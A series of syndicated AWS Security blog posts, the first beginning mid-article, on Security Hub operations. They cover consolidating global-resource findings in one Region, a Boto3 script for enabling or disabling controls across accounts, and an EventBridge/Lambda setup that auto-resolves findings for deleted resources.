aws configservice put-configuration-recorder --configuration-recorder name=default,roleARN=arn:aws:iam::123456789012:role/config-role --recording-group allSupported=true,includeGlobalResourceTypes=false

If you have deployed AWS Config using these CloudFormation templates, set IncludeGlobalResourceTypes to False under AWS::Config::ConfigurationRecorder in the Regions where you do not want to track global resources, and set it to True in the aggregation Region where you do. You can use the CloudFormation StackSets multi-Region deployment feature to deploy the template to all AWS Regions where AWS Config is enabled.
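If you would rather script this change than use StackSets, the following Boto3 sketch turns off global resource recording in a list of Regions; the Region list is an example, and the sketch assumes a configuration recorder already exists in each Region:

import boto3

# Regions where global resource recording should be turned OFF; keep it
# enabled only in your aggregation Region (for example, us-east-1).
regions = ["us-east-2", "us-west-1", "us-west-2"]

for region in regions:
    config = boto3.client("config", region_name=region)
    for recorder in config.describe_configuration_recorders()["ConfigurationRecorders"]:
        recorder["recordingGroup"]["allSupported"] = True
        recorder["recordingGroup"]["includeGlobalResourceTypes"] = False
        config.put_configuration_recorder(ConfigurationRecorder=recorder)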

For more details about AWS Config global resources, see Selecting AWS Config resources to record.

Disable AWS Security Hub AWS Foundational Best Practices periodic controls associated with global resources

The AWS Security Hub AWS Foundational Security Best Practices standard performs checks against the resources in your AWS environment by using AWS Config rules. After you have disabled recording of AWS Config global resources in all Regions except the Region that runs global recording, disable the Security Hub controls that deal with global resources, as shown in Figure 5 below.

You can disable AWS Security Hub controls relating to global resources using the console or CLI.

To disable AWS Security Hub controls (Console)

Follow the steps below to disable Security Hub controls that deal with global resources in the AWS Console.

  1. Navigate to the Security Hub console and select Security Standards on the left side of the screen.
  2. Click on the AWS Foundational Security Best Practices v1.0.0 security standard.
  3. Use the filter box to search for IAM. You should now see security controls IAM.1-IAM.7, which are the Security Hub global controls.

     Figure 4. Security Hub global controls

  4. Click on each control and select Disable in the top right corner.
  5. Add a reason for disabling, and then choose Disable.
Figure 5. Disabling Security Hub control

To disable AWS Security Hub controls (CLI)

Alternatively, you can disable Security Hub controls that deal with global resources using the CLI.

aws securityhub update-standards-control --standards-control-arn <control ARN> --control-status "DISABLED" --disabled-reason <description of reason to disable>

Here's a sample CLI command to disable a Security Hub control:

aws securityhub update-standards-control --standards-control-arn "arn:aws:securityhub:us-east-1:123456789012:control/aws-foundational-security-best-practices/v/1.0.0/ACM.1" --control-status "DISABLED" --disabled-reason "Not applicable for my service"

You can also follow instructions to implement a solution to disable specific Security Hub controls for multiple AWS accounts.

Be sure to disable the Security Hub controls only in the Regions where global recording is also disabled. Verify that the Security Hub controls associated with global resources remain enabled in the Region where AWS Config global resource recording is enabled.
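A short Boto3 sketch of this per-Region control update follows; the account ID and Region list are examples, and the control ARNs assume the AWS Foundational Security Best Practices standard:

import boto3

account_id = "123456789012"  # account where the controls are being disabled
regions = ["us-east-2", "us-west-1", "us-west-2"]  # Regions without global recording
controls = ["IAM.1", "IAM.2", "IAM.3", "IAM.4", "IAM.5", "IAM.6", "IAM.7"]

for region in regions:
    securityhub = boto3.client("securityhub", region_name=region)
    for control in controls:
        arn = (f"arn:aws:securityhub:{region}:{account_id}:control/"
               f"aws-foundational-security-best-practices/v/1.0.0/{control}")
        securityhub.update_standards_control(
            StandardsControlArn=arn,
            ControlStatus="DISABLED",
            DisabledReason="Global resources are recorded in us-east-1 only",
        )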

After you have disabled these controls and the recording of global resources, also disable the [Config.1] AWS Config should be enabled control in those Regions. This control requires the recording of global resources in order to pass, which you no longer need enabled in multiple Regions.

For more details about AWS Security Hub controls, see Disabling and enabling individual AWS Security Hub controls.

Implement automatic remediation from a central Region

Once findings are consolidated and ingested into Security Hub across all your organization’s AWS accounts, you should implement auto-remediation where possible, including everything from resource misconfigurations to automated quarantine of infected EC2 instances. Security Hub provides multiple ways to achieve this through end-to-end automation with EventBridge or through human-triggered automation with Security Hub Custom Actions. You can deploy automatic remediation solutions in a single Region to perform cross-Region remediation. This helps you deploy fewer resources, saving money and operational overhead. For more information on how to enable the solution for Security Hub Automated Response and Remediation, see this blog post.

If you have automation currently in place, it's important to understand how findings from multiple Regions triggering your automation might be affected. For example, you might have a Lambda function that remediates problems with S3 buckets and assumes it is being invoked in the same Region as the S3 bucket it needs to remediate. With cross-Region aggregation, your Lambda function might need to make a cross-Region AWS SDK call. The function runs in the Region where the aggregation occurs, but the bucket could be in another Region, so you might have to adjust your function to handle that situation. Also, the role associated with the Lambda function could have its privileges limited to a single Region. If you intend the same function to work in all Regions, you might need to change the IAM policy for the IAM role used by the Lambda function. Make sure to check Service Control Policies in AWS Organizations, if you use them, because they can deny actions in one Region while allowing them in another.

When enabling cross-Region finding aggregation, you'll need to understand how any automatic remediation that is in place today could be affected. Be sure to test your remediation functions on resources in various Regions to confirm that remediation works in all the Regions you monitor.

Conclusion

This blog post highlights configurations you can take advantage of to reduce operational overhead and provide cost savings by using cross-Region finding aggregation in Security Hub. The examples given apply to the majority of AWS environments, and are meant to be action items you can use to improve the overall security and operational effectiveness of your AWS environment.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the re:Post forum.

Want more AWS Security news? Follow us on Twitter.

Marshall Jones

Marshall is a Worldwide Security Specialist Solutions Architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Jonathan Nguyen

Jonathan is a Shared Delivery Team Senior Security Consultant at AWS. His background is in AWS Security with a focus on Threat Detection and Incident Response. Today, he helps enterprise customers develop a comprehensive AWS Security strategy, deploy security solutions at scale, and train customers on AWS Security best practices.

Disabling Security Hub controls in a multi-account environment

Post Syndicated from Priyank Ghedia original https://aws.amazon.com/blogs/security/disabling-security-hub-controls-in-a-multi-account-environment/

In this blog post, you'll learn about an automated process for disabling or enabling selected AWS Security Hub controls across multiple accounts and multiple Regions. You may already know how to disable Security Hub controls through the Security Hub console or by using the Security Hub update-standards-control API. However, these methods work on a per-account, per-Region basis. If you want to tune your posture by disabling some controls across multiple accounts, this automated approach makes it easier.

The update Security Hub controls script provided in this post uses cross-account access to disable or enable several controls across multiple accounts and multiple Regions on an ad hoc basis, without having to maintain resources in each Region. These accounts can be individual accounts where Security Hub is managed independently per account, part of a Security Hub administrator setup, or a combination of these. You will need to run the script again for newly added AWS accounts to keep their control status consistent.

This blog post also describes an alternative solution, which automates updating Security Hub controls on a schedule for any new AWS accounts that are added, and keeps the control status in member accounts consistent with the control status in the Security Hub administrator account. The alternative solution only works if you use a Security Hub administrator setup, and it must be deployed on a per-Region basis.

Why disable controls?

Security Hub generates findings from continuous checks against a set of rules from supported security standards. These checks provide a readiness score and identify specific accounts and resources that require attention.

It can be useful to turn off security checks for controls that are not relevant to your environment. Disabling irrelevant controls makes it easier to identify the important findings that you can take action on.

Reasons to disable controls

There are several reasons you may choose to disable controls:

  • Controls for unused services
  • Controls using global resources
  • Controls with compensating controls

Unused services

If you are not using the specific AWS service for which a control is enabled, you may want to disable controls that have periodic checks associated with that service.

Note: Periodic checks run automatically every 12 hours, whereas change-triggered checks run when the associated resource changes state. Change-triggered checks do not run if the associated in-scope resource does not exist, so you do not have to disable controls that explicitly use change-triggered checks.

For example, SageMaker.1 is a control that has a periodic check and is part of the AWS Foundational Security Best Practices standard. If you do not use Amazon SageMaker in your environment, you can disable this check temporarily. If you disable a check for an unused service and later start using the service, you must enable the check again. You should regularly analyze which services are in use across your AWS accounts.

Global resources

Global resources, such as AWS Identity and Access Management (IAM), generate findings in each Region where you have Security Hub enabled. To focus only on meaningful findings, you can disable controls for global resources in all but one Region. The Region you choose should be the same Region where AWS Config global recording is enabled.

Compensating controls

You may want to disable a Security Hub control for which a compensating control is in place. For example, the AWS Foundational Security Best Practices control CloudTrail.5 checks whether AWS CloudTrail is configured to send logs to Amazon CloudWatch Logs. You can disable this check if you are sending CloudTrail logs to another destination, such as Amazon Simple Storage Service (Amazon S3) or a partner tool such as a SIEM solution. Another example is the CIS 3.x controls: GuardDuty can be considered a compensating control, instead of CloudWatch alarms, for CIS 3.1 through 3.14.

Solution overview

The update Security Hub controls script shown below is written in Python. It uses the AWS SDK for Python (Boto3) to assume a cross-account IAM role in the accounts passed to the script, and uses the update-standards-control Security Hub API to enable or disable controls. You must deploy this solution in a single AWS Region.

We will review the prerequisites in the next section to understand the requirements for successfully using this solution. We will then walk through the instructions for deploying this automation through an Amazon Elastic Compute Cloud (Amazon EC2) instance along with examples of how to use the script.

Note: You can also use your local machine or AWS CloudShell if you meet the prerequisites described below.

Prerequisites

The update Security Hub controls script shown below requires:

  • An IAM role for cross-account access. You should have an IAM principal that is able to assume an IAM role in each account where Security Hub controls need to be disabled or enabled. This role should have the securityhub:UpdateStandardsControl permission.

    Note: If you used the Security Hub multiaccount scripts from awslabs to enable Security Hub for multiple accounts, you can use the role provided in that repository for this blog, because it has the necessary permissions.

  • AWS CLI
  • Python
  • Boto3

Update Security Hub controls script

Let’s review the arguments the script uses to run successfully. There are both required arguments and optional arguments:

Required arguments

--input-file
Path to a CSV file containing the list of 12-digit AWS account IDs whose controls you want to disable or enable. If you are using a Security Hub administrator account, use the list-members API to generate a list of all accounts where Security Hub is enabled. Store this list in a CSV file, one account ID per line.
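As a sketch of generating that CSV file from the administrator account with Boto3 (the output file name accounts.csv matches the examples later in this post):

import boto3
import csv

securityhub = boto3.client("securityhub")  # run in the administrator account

with open("accounts.csv", "w", newline="") as f:
    writer = csv.writer(f)
    token = None
    while True:
        kwargs = {"OnlyAssociated": True}
        if token:
            kwargs["NextToken"] = token
        page = securityhub.list_members(**kwargs)
        for member in page["Members"]:
            writer.writerow([member["AccountId"]])
        token = page.get("NextToken")
        if not token:
            break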

--assume-role
Role name of the execution role in each account. This role should have the securityhub:UpdateStandardsControl permission. If you use the sample execution role CloudFormation template provided in Part B–Execution role, the name of this role is ManageSecurityHubControlsExecutionRole.

--regions
Comma-separated list of Regions in which to update Security Hub controls. Do not add any spaces after each comma. Specify ALL to consider all Regions where Security Hub is available. If you list a Region where you have not enabled Security Hub, the script will skip that Region and log the failure.

--standard
Enter the standard code (AFSBP, CIS, PCIDSS).
AFSBP for AWS Foundational Security Best Practices
CIS for CIS AWS Foundations
PCIDSS for Payment Card Industry Data Security Standard (PCI DSS)

The script works with one Security Hub Standard at a time. For example, you can only disable AFSBP controls in the first run of the script. If you want to disable multiple controls across AFSBP and CIS standards you must run the script twice, once for AFSBP and once for CIS controls.

--control-id-list
Comma-separated list of control IDs. For example, for CIS enter 1.1,1.2; for PCIDSS enter PCI.AutoScaling.1,PCI.CloudTrail.4.

Do not add any spaces after each comma. Control IDs can be found in the Security Hub console: Security Standards > View results > ID column in the enabled controls table. You can also find the control IDs in the Security Hub controls documentation for each standard.

Figure 1: Sample Control IDs of PCI security standards shown in console

--control-action
To enable controls, use ENABLED; to disable controls, use DISABLED.

--disabled-reason
Reason for disabling the controls. This text appears in the Security Hub console for the disabled controls; it helps future reviewers understand why a control was disabled. If you want to use different reasons for different controls, run the script multiple times, once for each disable reason. This argument is NOT required (or used) for enabling controls.

Optional arguments

-h, --help
Show the help message and exit.

--profile
If this argument is not given, the default profile will be used. Use this argument to pass a named profile. The credentials in this profile should have permissions to assume the execution role in each account.

Solution deployment

We are using an Amazon EC2 instance with Amazon Linux 2 (AL2) to run this automation. We will create the instance role for the EC2 instance in Part A, create the execution role in Part B, and launch the EC2 instance to run the update Security Hub controls script in Part C.

Note: For the purpose of this blog, we will be creating the EC2 instance and the instance role in the Security Hub administrator account; however, this is not a requirement. If you have existing cross-account roles with the necessary permissions, you can use those roles instead.

Part A–Security Hub controls manager EC2 role

This role should have permission to assume (sts:AssumeRole) the execution role described in Part B.

Figure 2: Amazon EC2 Instance role assumes cross account IAM role

A sample policy for this role is provided below. This policy limits the Security Hub controls manager EC2 role to assume only a specific execution role in the downstream accounts:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Resource": "arn:aws:iam::*:role/ManageSecurityHubControlsExecutionRole"
        }
    ]
}

To create the SHControlsManagerEC2 role

  1. Navigate to the IAM console of the Security Hub administrator account. You must have permission to launch an EC2 instance in this account.
  2. Create a new policy using JSON policy editor, and name it SHAssumeRolePolicy.
  3. Copy the sample policy shown above and paste it into your new policy in the JSON editor. The resource in the policy is the execution role, as will be described in Part B—Execution role below.

    Note: If you are using an existing role as the execution role, rather than creating a new role as shown in Steps 1-4, you will need to change the Resource section of the preceding sample policy to the ARN of the existing execution role.

  4. In the IAM console, create an IAM role for EC2 and name it SHControlsManagerEC2. Assign the following policies:
    1. The SHAssumeRolePolicy policy you created in step 2.
    2. The AmazonSSMManagedInstanceCore managed policy for managing the instance using AWS Systems Manager.
    3. The AWSSecurityHubReadOnlyAccess managed policy for allowing read only access to Security Hub.

    Figure 3: IAM policies attached to Amazon EC2 Instance role

  5. When you are finished creating the role, note its Amazon Resource Name (ARN) – you will be using it in Part B. The ARN will look like the example in Figure 4: arn:aws:iam::111111222222:role/SHControlsManagerEC2

    Figure 4: ARN of the Amazon EC2 instance role

Part B–Execution role

The execution role must be created in all accounts where you will be disabling or enabling controls. This role should have securityhub:UpdateStandardsControl permission. The execution role trust relationship should allow the Security Hub controls manager role to assume the execution role.

Important: The name of the execution role must be identical in each account (including the Security Hub administrator account), otherwise the script will NOT work.

If you are using AWS Organizations, you can use CloudFormation StackSets to deploy this execution role across all of your accounts. The stack set runs across the organization at the root or organizational unit (OU) level of your choice. The CloudFormation template takes the ARN you noted for the Security Hub controls manager EC2 role as a parameter.

Sample execution role policy

A sample policy for the execution role is provided below:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "securityhub:UpdateStandardsControl",
            "Resource": "arn:aws:securityhub:*:*:hub/default"
        }
    ]
}

Sample execution role trust policy

Note: The ARN in the principal section below should be the ARN you noted in step 5 of Part A–Security Hub controls manager EC2 role.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111222222:role/SHControlsManagerEC2"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

To launch the stack set for creating cross account IAM Roles

  1. Log in to the console of the Organizations management account or the CloudFormation delegated administrator account.
  2. Select StackSets and choose Create StackSet.
  3. Choose Template is ready, and select Amazon S3 URL as the template source.
  4. Enter the following URL, and then click Next: https://awsiammedia.s3.amazonaws.com/public/sample/1083-disabling-security-hub-controls-multi-account/aws-securityhub-updatecontrols-executionrole.yml

    Figure 5: Create a AWS CloudFormation StackSet

  5. Enter a StackSet name, update the description as needed, and then, under Parameters, enter the ARN of the Security Hub controls manager EC2 role from step 5 of Part A–Security Hub controls manager EC2 role. Choose Next.

    Figure 6: AWS CloudFormation StackSet parameters for creating cross account IAM role

  6. (Optional) On the Configure StackSet options page, go to Tags and add tags to identify and organize your stack set.

    Figure 7: Optionally define tags for the stacks created using AWS CloudFormation StackSet

  7. On the Set deployment options page, select the desired Region. Because the resource being created is an IAM role, which is global, you only need to specify one Region. Choose Next.

    Figure 8: Specify target regions where the CloudFormation stacks need to be created

  8. Review the definition and select I acknowledge that AWS CloudFormation might create IAM resources. Choose Submit.
  9. You can monitor the creation of the stack set from the Operations tab to ensure that deployment is successful.

Note: StackSets does not deploy stack instances to the organization’s management account, even if the management account is in your organization or in an OU in your organization. You will need to create the execution role manually in the organization management account.

Part C–Launch EC2

We will be using a t2.micro EC2 instance with the Amazon Linux 2 (AL2) image, which comes with the AWS CLI and Python preinstalled. This instance size and image are free tier eligible.

To launch the EC2 instance for running the update Security Hub controls script

  1. Launch an EC2 instance in the Security Hub administrator account in a single Region. You can use any Region.
  2. Attach the IAM role created in Part A to the instance.
  3. Confirm the instance is in a running state.
  4. Log in to the instance CLI by using AWS Systems Manager Session Manager. Go to the EC2 console, select the instance, and choose Connect.

    Figure 9: Access newly launched Amazon EC2 instance using session manager

    Note: You will need to allow outbound access to Systems Manager endpoints for Session Manager to work. See the Session Manager documentation for more information.

  5. On the next page, choose Connect again.

    Figure 10: Connect to Amazon EC2 instance

  6. A new window with session manager will open.
  7. Set the working directory to home directory.
     cd /home/ssm-user
  8. Install Git:
     sudo yum install git
  9. Clone the UpdateSecurityHubControls code repository.
     git clone https://github.com/aws-samples/SecurityHub-Multiaccount-UpdateControls.git
  10. Create and activate a virtual environment.
     python3 -m venv SecurityHub-Multiaccount-UpdateControls/env
     source SecurityHub-Multiaccount-UpdateControls/env/bin/activate
  11. Upgrade pip and install Boto3.
     pip install pip --upgrade
     pip install boto3

You are now ready to run the script.

Example 1–Disabling Controls

Let’s assume you have Config global recording enabled in us-east-1 and want to disable controls associated with global resources (IAM.1, IAM.2, IAM.3, IAM.4, IAM.5, IAM.6, IAM.7) for AWS Foundational Security Best Practices standard in Regions us-west-1, us-east-2 in all accounts. The name of our execution role in all accounts is ManageSecurityHubControlsExecutionRole

  1. Change to the correct directory
    $ cd SecurityHub-Multiaccount-UpdateControls
  2. Create a file with the list of account IDs. This is passed with the input-file argument.
    $ nano accounts.csv
  3. Enter account IDs, one per line, and then save the file.

    Figure 11: CSV file with AWS account IDs

  4. Run the script:
     python SH-UpdateControls.py \
    --input-file accounts.csv \
    --assume-role ManageSecurityHubControlsExecutionRole \
    --regions us-east-2,us-west-1 \
    --standard AFSBP \
    --control-id-list IAM.1,IAM.2,IAM.3,IAM.4,IAM.5,IAM.6,IAM.7 \
    --control-action DISABLED \
    --disabled-reason 'Disabling IAM checks in all regions except for us-east-1, as global recording is enabled in us-east-1'
    
  5. As the script runs, it generates a summary of disabled controls. If there are failures, the reason for failures will be listed in the summary. A log file is also saved in the directory with execution logs.

    Figure 12: Execution Summary showing successful updates and failure information

Example 2–Enabling Controls

Let’s say you have disabled Control IDs PCI.CodeBuild.1 and PCI.CodeBuild.2 from the PCI standard in your accounts, as in the past, you did not use AWS CodeBuild in your PCI environment.

After a recent architecture review, you decided to begin using CodeBuild in your accounts in us-west-1, eu-west-1, ap-southeast-1. The name of our execution role in all accounts is ManageSecurityHubControlsExecutionRole.

  1. Confirm you have completed all steps in Part C.
  2. Change to the correct directory.
    $ cd SecurityHub-Multiaccount-UpdateControls
  3. Create a file with the list of account IDs. This will be passed with the input-file argument.
    $ nano accounts.csv
    Enter account IDs, one per line, and then save the file.

    Figure 13: CSV file with AWS account IDs

  4. Run the script to enable the controls:
     python SH-UpdateControls.py \
    --input-file accounts.csv \
    --assume-role ManageSecurityHubControlsExecutionRole \
    --regions us-west-1,eu-west-1,ap-southeast-1 \
    --standard PCIDSS \
    --control-id-list PCI.CodeBuild.1,PCI.CodeBuild.2 \
    --control-action ENABLED
  5. As the script runs, it generates a summary of enabled controls. If there are failures, the reasons will be listed in the summary. A log file with execution logs is also saved in the directory.

    Figure 14: Execution Summary showing controls enabled

Alternative Solution

Consider a case where new member accounts are added to the Security Hub administrator account of the organization. In such a scenario, you would have to disable the controls manually or rerun the update Security Hub controls script for each new account.

Figure 15: High level architecture

This alternative solution addresses the problem by automating the process with AWS Step Functions and a scheduled EventBridge event. A state machine is triggered every 24 hours to update the status of the standard controls in all AWS accounts registered as members in the Security Hub administrator account. The solution maintains a list of account IDs in a DynamoDB table so that exceptions can be made for specific accounts. For details on how to deploy and use this solution, refer to this GitHub repository. This alternative solution and the update Security Hub controls script are independent of each other.

Conclusion

In this blog post, you learned some of the reasons you might disable Security Hub controls. We showed how controls can quickly be disabled or enabled by using the update Security Hub controls script provided. This script will save you time if you want to update controls across multiple accounts and multiple Regions on an as-needed basis.

We also introduced an alternative solution that uses AWS Step Functions and a scheduled EventBridge event to update Security Hub controls in new accounts on a regular basis. You can use either of the two solutions, depending on your scenario.

If you have feedback about this post, submit comments in the Comments section below. If you have trouble with the scripts, please open an issue in GitHub.

Want more AWS Security news? Follow us on Twitter.

Priyank Ghedia

Priyank is a Solutions Architect focused on threat detection and incident response. Priyank helps customers meet their security visibility and response objectives by building architectures using AWS security services and tools. Before AWS, he spent eight years advising customers on global networking and security operations.

Praveen Haranahalli

Praveen Haranahalli is a Solutions Architect at AWS, based in Orlando, Florida. Praveen has helped a diverse set of customers design and operate a broad variety of workloads using AWS services and has a keen interest in security and governance. Outside of work, he loves being outdoors with his family.

Ahmed Bakry

Ahmed Bakry is a Security Consultant at AWS Professional Services, based in Amsterdam. He obtained his master's degree in computer science at the University of Twente, specializing in cybersecurity, and his bachelor's degree in networks engineering at the German University in Cairo. His passion is developing secure and robust applications that drive success for his customers.

Michael Fuellbier

Michael Fuellbier is a Security Consultant at AWS Professional Services. His passion is designing and building secure and robust applications together with his customers. He studied mathematics and has a background in penetration testing.

Automatically resolve Security Hub findings for resources that no longer exist

Post Syndicated from Kris Normand original https://aws.amazon.com/blogs/security/automatically-resolve-security-hub-findings-for-resources-that-no-longer-exist/

In this post, you’ll learn how to automatically resolve AWS Security Hub findings for previously deleted Amazon Web Services (AWS) resources. By using an event-driven solution, you can automatically resolve findings for AWS and third-party service integrations.

Security Hub provides a comprehensive view of your security alerts and security posture across your AWS accounts. Security Hub provides a single place that aggregates, organizes, and prioritizes your security alerts (also called findings) from multiple AWS services and partner solutions. Security Hub lets you assign workflow statuses of NEW, NOTIFIED, SUPPRESSED, or RESOLVED to findings. These statuses help you understand the state of your security findings and identify which need attention. As AWS resources are spun up and down during the course of normal business activities, there might be findings in Security Hub for those resources. AWS Security Hub findings backed by AWS Config are automatically archived when AWS Config identifies that a resource has been deleted. However, for some AWS service integrations—such as Amazon GuardDuty and third-party partner products—findings aren’t automatically resolved or archived when a resource is deleted. This can result in orphaned findings for resources that no longer exist.

In this post, we show you how to use an event-driven architecture to automatically resolve findings for all providers—AWS and third-party—for resources that have been deleted. Automatically resolving these findings reduces alert fatigue by decreasing noise, allowing your security team to focus on investigating and remediating high fidelity findings.

A common use case for automatically resolving findings is Amazon Elastic Compute Cloud (Amazon EC2) instances that are ephemeral in nature, such as EC2 instances that are part of an Amazon EC2 Auto Scaling group. Such a group can scale to thousands of instances multiple times a day depending on the workload. Without automatically resolving these findings, you could end up with one or more findings for each instance. By automatically resolving findings for the deleted resources, your teams can focus on investigating and remediating findings that affect active resources.

Prerequisites

This solution assumes that you have Security Hub and AWS Config configured across all of your AWS accounts. Instructions for configuring Security Hub and its dependencies can be found in the Security Hub user guide. Ensure you have configured Security Hub to use a delegated administrator account, which centralizes findings from all member accounts.

Solution overview

In Security Hub, the investigation status of a finding is tracked using the workflow status attribute. The workflow status attribute for new findings is initially set to NEW. You can change the workflow status of a finding by either selecting it in the AWS Security Hub console, or by automating the change of workflow status by using the AWS Command Line Interface (AWS CLI) or Security Hub SDKs. The usual workflow for a finding, whether managed manually or through automation, is NEW, NOTIFIED, then RESOLVED or SUPPRESSED.

In this solution, we show you how to automatically set the workflow status to RESOLVED for all applicable findings when an EC2 instance, Amazon Simple Storage Service (Amazon S3) bucket, or an AWS Identity and Access Management (IAM) role is deleted. This event-driven solution uses Amazon EventBridge event patterns—which can be easily customized to meet your specific business needs—to invoke the resolution workflow on Delete or Terminate API calls. An EventBridge event bus is used to forward all Delete or Terminate API calls to your Security Hub delegated administrator account. Event patterns are used to filter for specific events and forward them to a target. With this solution, you filter for specific Delete and Terminate events, identified by the event name. The target for matching events is an AWS Lambda function. The invocation of this function includes context around the event which includes the metadata for the resource that was just deleted or terminated. This function queries the Security Hub GetFindings API for all findings for the resource with a status of NEW or NOTIFIED. The function then sets the workflow status to RESOLVED for all findings for the Amazon Resource Name (ARN) of the given resource by calling the BatchUpdateFindings Security Hub API.
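To make the GetFindings and BatchUpdateFindings flow concrete, here is a minimal sketch of the core logic in Python. The deployed Lambda function in this solution does more (such as extracting the resource ARN from the CloudTrail event), so treat this as an illustration rather than the solution's actual code:

import boto3

securityhub = boto3.client("securityhub")

def resolve_findings_for_resource(resource_arn):
    # Collect all NEW or NOTIFIED findings for the deleted resource.
    filters = {
        "ResourceId": [{"Value": resource_arn, "Comparison": "EQUALS"}],
        "WorkflowStatus": [
            {"Value": "NEW", "Comparison": "EQUALS"},
            {"Value": "NOTIFIED", "Comparison": "EQUALS"},
        ],
    }
    identifiers = []
    for page in securityhub.get_paginator("get_findings").paginate(Filters=filters):
        for finding in page["Findings"]:
            identifiers.append({"Id": finding["Id"], "ProductArn": finding["ProductArn"]})

    # Mark them RESOLVED, 100 at a time (the BatchUpdateFindings limit).
    for i in range(0, len(identifiers), 100):
        securityhub.batch_update_findings(
            FindingIdentifiers=identifiers[i:i + 100],
            Workflow={"Status": "RESOLVED"},
            Note={"Text": "Resource deleted", "UpdatedBy": "DeletedResourceFindingResolver"},
        )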

Solution architecture

Figure 1: Solution architecture overview

Figure 1 shows the deletion of an AWS resource in a Security Hub member account being forwarded to the EventBridge event bus in the Security Hub administrator account. The process flow is as follows:

  1. In a Security Hub member account, a user deletes or terminates a resource through the AWS Management Console, AWS CLI, or SDK.
  2. AWS CloudTrail logs the user activity and automatically forwards an event to EventBridge.
  3. An EventBridge event pattern filters for the delete or terminate API call, and generates an event.
  4. The event is forwarded to the event bus in the Security Hub administrator account.
  5. In the Security Hub administrator account, an event pattern is used to filter for all delete or terminate API calls (a sample pattern is shown after this list).
  6. Matching events generate an EventBridge event.
  7. The target for this event is the Lambda function to resolve Security Hub findings for the recently deleted resource.
  8. The Lambda function generates a list of all findings for the recently deleted resource and updates the workflow status for each finding to RESOLVED in the Security Hub delegated administrator account.
  9. The workflow status propagates from the Security Hub delegated administrator account to the member accounts of Security Hub.
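As an illustration of the event pattern in step 5, the following Boto3 sketch creates a rule on the administrator account's default event bus that matches CloudTrail-delivered delete and terminate calls for the three resource types covered in this post. The rule name is a placeholder; the CloudFormation template in the next section creates the real rule for you:

import boto3
import json

events = boto3.client("events")  # Security Hub administrator account

pattern = {
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
        "eventSource": ["ec2.amazonaws.com", "s3.amazonaws.com", "iam.amazonaws.com"],
        "eventName": ["TerminateInstances", "DeleteBucket", "DeleteRole"],
    },
}

events.put_rule(
    Name="resolve-findings-for-deleted-resources",
    EventPattern=json.dumps(pattern),
    State="ENABLED",
)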

To deploy the solution

In the Security Hub administrator account complete the following steps:

  1. In the following resource policy, replace <Region> with the AWS Region where the solution is deployed, <AccountID> with the Security Hub administrator account ID, and <OrgID> with the ID of your organization in AWS Organizations.
    {
      "Version": "2012-10-17",
      "Statement": [{
        "Sid": "allow_all_accounts_from_organization_to_put_events",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "events:PutEvents",
        "Resource": "arn:aws:events:<Region>:<AccountID>:event-bus/default",
        "Condition": {
          "StringEquals": {
            "aws:PrincipalOrgID": "<OrgID>"
          }
        }
      }]
    }
    

  2. Add the edited resource policy to the default EventBridge event bus to allow all accounts in your organization to send delete events for IAM roles, EC2 instances, and S3 buckets to the default event bus in the Security Hub administrator account.

    Note: You can also choose to specify a list of accounts to receive events from. For more information about configuring a resource policy see Managing event bus permissions in Permissions for Amazon EventBridge event buses.

  3. Deploy the AWS CloudFormation template that creates the required resources.


In each Security Hub member account, deploy the CloudFormation template. You will need to specify the Security Hub administrator AWS account ID to deploy the stack.


Tip: CloudFormation StackSets can be used to deploy stacks across all accounts in your organization. For more information, see Working with AWS CloudFormation StackSets.

Note: With CloudFormation StackSets, the template isn’t deployed in the StackSet administrator account by default. The CloudFormation stack must be deployed separately in the StackSet administrator account.

Note: Security Hub now supports cross-Region aggregation of findings. If you have Security Hub cross-Region aggregation enabled, the solution in this post will work for findings in all aggregated Regions.
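If you manage event bus permissions programmatically, steps 1 and 2 can also be scripted. A sketch with Boto3 follows, where the Region, account ID, and organization ID are placeholder values:

import boto3
import json

events = boto3.client("events", region_name="us-east-1")

policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "allow_all_accounts_from_organization_to_put_events",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "events:PutEvents",
        "Resource": "arn:aws:events:us-east-1:123456789012:event-bus/default",
        "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-a1b2c3d4e5"}},
    }],
}

# Attach the resource policy to the default event bus.
events.put_permission(Policy=json.dumps(policy))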

Next steps

Understanding and fixing the root cause for Security Hub findings will improve your security posture and reduce the number of future findings. As a best practice, you should periodically analyze the findings for resources that have been automatically resolved by this solution to identify trends so that your team can investigate and fix root causes. You can use the filter below in the Security Hub console to view all findings automatically resolved by this solution:

To analyze findings

  1. Open the Security Hub console and select Findings.
  2. Filter by Workflow status is RESOLVED and Note updated by is DeletedResourceFindingResolver.
  3. (Optional) You can also create a custom insight for these findings by adding Group by: ProductName to the filter.
  4. Select Create Insight as shown in Figure 2.
Figure 2: AWS Security Hub
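If you prefer to create this insight programmatically, here is a minimal Boto3 sketch; the insight name is an example:

import boto3

securityhub = boto3.client("securityhub")

# Custom insight: findings auto-resolved by the solution, grouped by product.
securityhub.create_insight(
    Name="Findings resolved for deleted resources",
    Filters={
        "WorkflowStatus": [{"Value": "RESOLVED", "Comparison": "EQUALS"}],
        "NoteUpdatedBy": [{"Value": "DeletedResourceFindingResolver", "Comparison": "EQUALS"}],
    },
    GroupByAttribute="ProductName",
)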

Note: You can expand the solution to include other resource types based on your requirements, such as security groups, Amazon Relational Database Service (Amazon RDS) databases, and IAM users by updating the event pattern in the EventBridge rule and modifying the Lambda function code.

Conclusion

In this post, we showed how you can automatically resolve findings for deleted EC2, IAM, and S3 resources by using the Security Hub GetFindings and BatchUpdateFindings API actions. We showed you how to configure EventBridge patterns and rules to initiate a Lambda function through a centralized event bus to address these findings for resources across your organization.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Security Hub forum. To start your 30-day free trial of Security Hub, visit AWS Security Hub.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Kris Normand

